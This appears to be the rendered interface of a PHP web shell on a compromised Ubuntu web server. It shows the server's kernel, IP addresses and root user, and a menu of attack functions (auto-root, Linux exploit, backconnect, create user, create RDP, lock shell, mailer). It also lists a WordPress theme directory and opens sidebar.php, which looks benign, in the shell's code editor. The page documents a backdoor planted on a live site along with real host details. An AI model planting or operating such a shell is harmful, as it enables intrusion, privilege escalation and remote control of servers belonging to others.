Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
twentyfourteen /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
404.php
719
B
-rw-r--r--
archive.php
2.1
KB
-rw-r--r--
author.php
1.88
KB
-rw-r--r--
category.php
1.49
KB
-rw-r--r--
comments.php
2.62
KB
-rw-r--r--
content-aside.php
2.27
KB
-rw-r--r--
content-audio.php
2.27
KB
-rw-r--r--
content-featured-post.php
1.09
KB
-rw-r--r--
content-gallery.php
2.28
KB
-rw-r--r--
content-image.php
2.27
KB
-rw-r--r--
content-link.php
2.27
KB
-rw-r--r--
content-none.php
961
B
-rw-r--r--
content-page.php
884
B
-rw-r--r--
content-quote.php
2.27
KB
-rw-r--r--
content-video.php
2.27
KB
-rw-r--r--
content.php
2.29
KB
-rw-r--r--
error_log
6.79
KB
-rw-r--r--
featured-content.php
941
B
-rw-r--r--
footer.php
927
B
-rw-r--r--
functions.php
19.92
KB
-rw-r--r--
header.php
2.41
KB
-rw-r--r--
image.php
2.63
KB
-rw-r--r--
index.php
1.53
KB
-rw-r--r--
page.php
1.15
KB
-rw-r--r--
readme.txt
4.2
KB
-rw-r--r--
rtl.css
15.5
KB
-rw-r--r--
screenshot.png
911.43
KB
-rw-r--r--
search.php
1.19
KB
-rw-r--r--
sidebar-content.php
340
B
-rw-r--r--
sidebar-footer.php
395
B
-rw-r--r--
sidebar.php
847
B
-rw-r--r--
single.php
1017
B
-rw-r--r--
style.css
79.31
KB
-rw-r--r--
tag.php
1.55
KB
-rw-r--r--
taxonomy-post_format.php
2.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.php
<?php /** * The Sidebar containing the main widget area * * @package WordPress * @subpackage Twenty_Fourteen * @since Twenty Fourteen 1.0 */ ?> <div id="secondary"> <?php $description = get_bloginfo( 'description', 'display' ); if ( ! empty( $description ) ) : ?> <h2 class="site-description"><?php echo esc_html( $description ); ?></h2> <?php endif; ?> <?php if ( has_nav_menu( 'secondary' ) ) : ?> <nav role="navigation" class="navigation site-navigation secondary-navigation"> <?php wp_nav_menu( array( 'theme_location' => 'secondary' ) ); ?> </nav> <?php endif; ?> <?php if ( is_active_sidebar( 'sidebar-1' ) ) : ?> <div id="primary-sidebar" class="primary-sidebar widget-area" role="complementary"> <?php dynamic_sidebar( 'sidebar-1' ); ?> </div><!-- #primary-sidebar --> <?php endif; ?> </div><!-- #secondary -->
Close